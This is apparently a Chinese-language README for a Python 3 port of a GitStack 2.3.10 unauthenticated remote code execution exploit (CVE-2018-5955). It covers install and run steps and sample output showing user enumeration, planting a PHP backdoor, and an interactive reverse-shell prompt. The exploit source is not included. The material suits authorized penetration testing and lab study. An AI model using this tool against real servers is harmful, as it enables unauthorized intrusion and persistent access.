CVE 2018 5955
1.0.0
CVE-2018-5955 GITSTACK 2.3.10未经身份验证的RCE的利用
利用:Gitstack 2.3.10未经验证的远程代码执行
日期:2018年1月18日
软件链接:https://gitstack.com/
漏洞作者:kacper szurek
原始利用:https://www.exploit-db.com/exploits/43777
网站:https://security.szurek.pl/
类别:远程
CVE:CVE-2018-5955
日期:23.06.2023
新功能:Interactive RCE,OS检测,反向外壳功能,从Python2改编为Python33
CVE:CVE-2018-5955
类别:远程
我对您的行为不承担任何责任,因为我将其发布在GitHub上以进行教育目的或经过认证和授权的渗透测试
安装要求:
pip install colorama
然后,您可以运行它:
python3 exploit.py
在您利用CVE之后将检测到操作系统,实际上将有此输出线:“ [*] OS:$ operatatingsystem”(下面的Dimostration)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
您还可以键入“ OS”以找出哪种类型的操作系统是
要在目标上获取实际的反向外壳,您可以输入“ shell”,然后输入IP,然后以这样的方式键入您的收听端口:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE